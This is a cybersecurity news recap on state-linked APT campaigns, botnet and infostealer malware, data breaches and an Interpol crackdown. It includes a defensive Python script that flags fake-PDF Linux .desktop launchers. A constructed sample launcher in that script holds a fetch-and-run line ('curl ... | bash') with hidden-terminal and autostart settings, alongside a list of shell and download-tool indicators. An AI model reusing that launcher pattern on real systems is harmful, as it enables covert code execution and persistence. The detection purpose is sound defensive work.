This cybersecurity recap highlights ongoing activity by state-linked APT groups such as Murky Panda, Silk Typhoon, and APT36, which use supply-chain tactics and zero-day exploits against SaaS providers and government targets. It also covers recent malware campaigns hitting GeoServer, Redis and macOS (the Shamos infostealer), a run of data breach and ransomware disclosures, and cybercrime law-enforcement action across Africa. #MurkyPanda #SilkTyphoon #APT36 #GeoServer #Shamos #Interpol
State-linked APTs
- China-linked actors are abusing trusted cloud relationships and zero-days to compromise SaaS providers and pivot to their downstream customers, combining supply-chain tactics with compromised SOHO devices to mask the origin of their traffic — Murky Panda, Silk Typhoon, SharePoint PoC
- Pakistan-linked APT36 is abusing Linux .desktop launcher files to deliver persistent espionage malware disguised as PDFs to Indian government and defense targets — APT36 Linux
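The trick behind the APT36 item is that a `.desktop` launcher can carry a document-looking `Name=`/`Icon=` while its `Exec=` line silently runs a shell or downloader. The following triage script is an added example for this recap, not code from the recap or from any vendor report; the two launcher bodies it scans are constructed samples, not real APT36 artifacts, and the indicator lists are assumptions chosen for illustration.

```python
"""Flag .desktop launchers that pose as documents but execute shells or downloaders.

Added example; not code from this recap or any vendor report. The sample
launchers below are constructed for illustration, not real malware.
"""
import re

# Interpreters and download/staging tools a "PDF" launcher has no business
# invoking (assumed indicator list; extend for your environment).
SUSPICIOUS_EXEC = {"bash", "sh", "dash", "zsh", "curl", "wget", "python",
                   "python3", "perl", "base64", "nohup", "chmod"}
SHELLS = {"bash", "sh", "dash", "zsh"}
DOC_HINTS = re.compile(r"(pdf|docx?|xlsx?|pptx?|document)", re.I)
STAGING_HINTS = re.compile(r"https?://|\bbase64\b|/tmp/|\$HOME/\.")


def parse_desktop(text):
    """Return key/value pairs from the [Desktop Entry] group of a launcher."""
    entries = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip()] = value.strip()
    return entries


def exec_basenames(exec_line):
    """Basenames of every path-like token in Exec=, including tokens nested
    inside a quoted `bash -c "..."` string, so a wrapped curl is still seen."""
    words = re.findall(r"[A-Za-z0-9_./-]+", exec_line)
    return {w.rsplit("/", 1)[-1] for w in words}


def analyze_desktop(text):
    """Return a list of findings; an empty list means nothing suspicious."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    names = exec_basenames(exec_line)
    tools = names & SUSPICIOUS_EXEC
    looks_like_doc = bool(DOC_HINTS.search(
        entry.get("Name", "") + " " + entry.get("Icon", "")))
    findings = []
    if looks_like_doc and tools:
        findings.append(f"document-themed launcher executes {sorted(tools)}")
    if STAGING_HINTS.search(exec_line):
        findings.append("Exec line contains download/staging indicators")
    if entry.get("Terminal", "false").lower() == "false" and tools & SHELLS:
        findings.append("shell runs with Terminal=false (hidden from the user)")
    if entry.get("X-GNOME-Autostart-enabled", "").lower() == "true":
        findings.append("autostart flag set (persistence candidate)")
    return findings


# Constructed samples (not real files from any campaign).
BENIGN = """[Desktop Entry]
Type=Application
Name=Notes.pdf
Icon=application-pdf
Exec=xdg-open /home/user/Notes.pdf
Terminal=false
"""

MALICIOUS = """[Desktop Entry]
Type=Application
Name=Meeting_Minutes.pdf
Icon=x-office-document
Exec=bash -c "curl -s http://203.0.113.10/p.sh | bash; xdg-open /tmp/decoy.pdf"
Terminal=false
X-GNOME-Autostart-enabled=true
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, analyze_desktop(sample) or ["clean"])
```

Run it against `~/.config/autostart/*.desktop`, `~/.local/share/applications/` and `~/Desktop/` as a quick hunt; pair the findings with the file's executable bit, since GNOME and KDE only launch (and hide the `.desktop` suffix of) entries that are marked executable or trusted, so a document-named launcher with the bit set is worth a second look on its own.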
Malware & Botnets
- Researchers warn of campaigns exploiting known flaws, including the GeoServer remote code execution bug CVE-2024-36401, to turn exposed GeoServer instances, Redis servers and IoT devices into botnet nodes, proxies and crypto-miners, with malware and campaigns such as PolarEdge, Gayfemboy and TA-NATALSTATUS — GeoServer Exploits
- macOS users are being lured by fake “fix” guides into installing the new Shamos infostealer (developer: COOKIE SPIDER), which steals credentials, wallets and browser data and has hit 300+ environments since June 2025 — Shamos Infostealer
Data Breaches & Ransomware
- UK criminal-background checker APCS suffered a breach via third‑party developer Intradev, exposing passports, driving licences and NI details and raising supply‑chain data-security concerns — APCS Breach
- An IT staffing firm notified 34K people that SSNs and personal data were leaked after a July 2024 breach claimed by ransomware group Play — Computer Merchant
- Michigan’s Aspire Rural Health System disclosed a ransomware incident (claimed by BianLian) that exposed medical and financial records of over 138K patients, underscoring ongoing healthcare targeting — Aspire Breach
Law Enforcement & Defense
- Interpol’s Operation Serengeti 2.0 led to arrests of over 1,200 suspects across 18 African countries and the UK and the recovery of nearly $97.4 million by dismantling crypto scams, mining centers and fraud networks — Interpol Crackdown
- A recent roundup highlights major prison sentences for cybercriminals and defensive improvements such as PyPI's monitoring of expired account e-mail domains, which closes an account-takeover path and strengthens supply-chain protections — Weekly Roundup